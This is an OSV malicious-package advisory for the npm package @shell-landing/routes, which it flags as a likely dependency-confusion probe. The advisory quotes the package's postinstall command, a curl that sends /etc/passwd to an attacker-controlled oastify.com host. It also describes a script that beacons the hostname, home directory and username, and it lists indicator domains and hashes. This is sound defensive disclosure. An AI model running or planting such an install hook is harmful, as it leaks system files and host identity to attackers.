MAL-2026-5429

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-landing/routes/MAL-2026-5429.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5429
Aliases
  • GHSA-9pv9-393c-q5f8
Published
2026-06-09T17:19:00Z
Modified
2026-08-13T22:15:21.715885150Z
Summary
Malicious code in @shell-landing/routes (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577)

On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com. The curl invocation POSTs the contents of /etc/passwd to an attacker-controlled Burp Collaborator subdomain, embedding the installer's hostname in the request. The companion script scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and beacons each as an HTTP GET subdomain of *.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com. The package contains no library code, no README, and no main entry — version 99.9.5 with a pure-exfil payload under the @shell-landing scope is consistent with a dependency-confusion probe targeting an internal package name. Any developer or CI running npm install will leak host identity and /etc/passwd to attacker infrastructure.

Source: ghsa-malware (dfe355c8a1957de0045f535aeefc286e71bcd4d36b7ef74aba09822560e0e733)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-06-09T17:45:49.873904036Z",
            "sha256": "6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577",
            "modified_time": "2026-06-09T17:19:00Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005027",
            "versions": [
                "99.9.5"
            ]
        },
        {
            "import_time": "2026-06-09T17:45:49.905899507Z",
            "sha256": "75491d01c9adcd8b4ea3535f0aed57f3763c03e1375e84b1a20cec842ae6d5b2",
            "modified_time": "2026-06-09T17:19:01Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005028",
            "versions": [
                "99.9.5"
            ]
        },
        {
            "import_time": "2026-08-13T22:11:44.604299405Z",
            "sha256": "dfe355c8a1957de0045f535aeefc286e71bcd4d36b7ef74aba09822560e0e733",
            "modified_time": "2026-08-13T15:29:42Z",
            "source": "ghsa-malware",
            "id": "GHSA-9pv9-393c-q5f8",
            "ranges": [
                {
                    "type": "SEMVER",
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ]
                }
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @shell-landing/routes

Package

Name
@shell-landing/routes
View open source insights on deps.dev
Purl
pkg:npm/%40shell-landing/routes

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

99.*
99.9.5

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-landing/routes/MAL-2026-5429.json"
indicators
{
    "evidence_files": [
        {
            "sha256": "b16d6e964a35304d2c3ab4c01fc722bd45b49c36a61c9282364719a236a8e741",
            "tlsh": "74d0a7b07800c6737acd06a38128a1457955c85b1214b96246df87e4912436174e6506",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "domains": [
        "7363616e2d353265363663323431616637.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "package_integrity": [
        {
            "filename": "routes-99.9.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-hjqjPpc4nwEToGMYjs7AgvTToo5ElKYbb4ne8S18NSfwJ7rg5BUMEll/iYjPncsCnh844HTikoYzowfp0hCqlA==",
                "sha1": "f369c3ef9e1f43b4f9bcaa6f25e011336d8af992"
            }
        }
    ]
}
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]